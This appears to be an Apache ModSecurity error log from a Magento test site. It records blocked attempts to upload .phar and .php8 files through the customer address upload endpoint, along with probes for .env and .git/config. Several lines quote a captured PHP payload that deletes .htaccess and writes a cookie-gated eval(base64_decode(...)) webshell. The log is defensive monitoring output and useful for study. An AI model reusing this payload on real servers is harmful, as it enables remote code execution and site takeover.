[Sat Dec 20 19:12:36.483148 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.php8"] [unique_id "aUbnFIwzYS-2Oqd5dh3_JAAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 21 07:42:52.161781 2025] [php:error] [pid 881890] [client 52.178.223.71:11424] script '/var/www/magento.test.indacotrentino.com/www/pub/images/m.php' not found or unable to stat
[Sun Dec 21 16:51:30.113599 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Rule 7fc942e6fbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/a/ha88364f428d25.phar"] [unique_id "aUgXgpjatPfNtFuDQSsSPwAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 21 16:51:30.114053 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/a/ha88364f428d25.phar"] [unique_id "aUgXgpjatPfNtFuDQSsSPwAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 21 16:51:30.116400 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/a/ha88364f428d25.phar"] [unique_id "aUgXgpjatPfNtFuDQSsSPwAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 21 16:51:30.116591 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/a/ha88364f428d25.phar"] [unique_id "aUgXgpjatPfNtFuDQSsSPwAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 21 16:51:30.626481 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ha88364f428d25.php8 found within FILES:custom_attributes[country_id]: ha88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUgXgpjatPfNtFuDQSsSQAAAACM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/h/a/ha88364f428d25.phar
[Sun Dec 21 16:51:30.627132 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUgXgpjatPfNtFuDQSsSQAAAACM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/h/a/ha88364f428d25.phar
[Sun Dec 21 16:51:30.627295 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUgXgpjatPfNtFuDQSsSQAAAACM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/h/a/ha88364f428d25.phar
[Sun Dec 21 16:51:31.244441 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Rule 7fc942e6fbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/a/ha88364f428d25.php8"] [unique_id "aUgXg5jatPfNtFuDQSsSQQAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 21 16:51:31.244934 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/a/ha88364f428d25.php8"] [unique_id "aUgXg5jatPfNtFuDQSsSQQAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 21 16:51:31.248613 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/a/ha88364f428d25.php8"] [unique_id "aUgXg5jatPfNtFuDQSsSQQAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 21 16:51:31.248879 2025] [:error] [pid 881892] [client 5.164.136.65:55810] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/a/ha88364f428d25.php8"] [unique_id "aUgXg5jatPfNtFuDQSsSQQAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 22 07:27:12.766064 2025] [authz_core:error] [pid 899038] [client 206.81.24.74:56402] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Dec 22 07:27:15.739910 2025] [:error] [pid 902719] [client 206.81.24.74:56424] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjkwx6WGa2ZloL8vwm8xAAAAAo"]
[Mon Dec 22 07:27:15.741282 2025] [:error] [pid 902719] [client 206.81.24.74:56424] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjkwx6WGa2ZloL8vwm8xAAAAAo"]
[Mon Dec 22 07:27:15.741484 2025] [:error] [pid 902719] [client 206.81.24.74:56424] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjkwx6WGa2ZloL8vwm8xAAAAAo"]
[Mon Dec 22 07:27:16.738603 2025] [:error] [pid 899041] [client 206.81.24.74:59938] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjkxEjUWwmX9_yPUUjjmAAAAAg"]
[Mon Dec 22 07:27:16.738839 2025] [:error] [pid 899041] [client 206.81.24.74:59938] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjkxEjUWwmX9_yPUUjjmAAAAAg"]
[Mon Dec 22 07:27:16.738988 2025] [:error] [pid 899041] [client 206.81.24.74:59938] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjkxEjUWwmX9_yPUUjjmAAAAAg"]
[Mon Dec 22 07:27:18.740655 2025] [:error] [pid 898841] [client 206.81.24.74:59944] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjkxr_ql2WWYT1u7JVsmAAAAAM"]
[Mon Dec 22 07:27:18.740881 2025] [:error] [pid 898841] [client 206.81.24.74:59944] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjkxr_ql2WWYT1u7JVsmAAAAAM"]
[Mon Dec 22 07:27:18.741036 2025] [:error] [pid 898841] [client 206.81.24.74:59944] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjkxr_ql2WWYT1u7JVsmAAAAAM"]
[Mon Dec 22 10:14:11.974664 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Rule 7f2f269b0be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/m/sm88364f428d25.phar"] [unique_id "aUkL4_r4G77J7RRdTh3xzgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 22 10:14:11.975169 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/m/sm88364f428d25.phar"] [unique_id "aUkL4_r4G77J7RRdTh3xzgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 22 10:14:11.977684 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/m/sm88364f428d25.phar"] [unique_id "aUkL4_r4G77J7RRdTh3xzgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 22 10:14:11.977867 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/m/sm88364f428d25.phar"] [unique_id "aUkL4_r4G77J7RRdTh3xzgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 22 10:14:13.470977 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: sm88364f428d25.php8 found within FILES:custom_attributes[country_id]: sm88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUkL5fr4G77J7RRdTh3xzwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/m/sm88364f428d25.phar
[Mon Dec 22 10:14:13.471627 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUkL5fr4G77J7RRdTh3xzwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/m/sm88364f428d25.phar
[Mon Dec 22 10:14:13.471813 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUkL5fr4G77J7RRdTh3xzwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/m/sm88364f428d25.phar
[Mon Dec 22 10:14:13.821116 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Rule 7f2f269b0be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/m/sm88364f428d25.php8"] [unique_id "aUkL5fr4G77J7RRdTh3x0AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 22 10:14:13.821565 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/m/sm88364f428d25.php8"] [unique_id "aUkL5fr4G77J7RRdTh3x0AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 22 10:14:13.823871 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/m/sm88364f428d25.php8"] [unique_id "aUkL5fr4G77J7RRdTh3x0AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 22 10:14:13.824055 2025] [:error] [pid 898838] [client 91.84.106.190:33276] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/m/sm88364f428d25.php8"] [unique_id "aUkL5fr4G77J7RRdTh3x0AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 03:33:27.964057 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Rule 7fb645375be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/a/sa88364f428d25.phar"] [unique_id "aUn_d4NeZfPRtoEjKvE7NAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 23 03:33:27.964596 2025] [:error] [pid 920445] [client 5.164.136.65:55992] [client 5.164.136.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 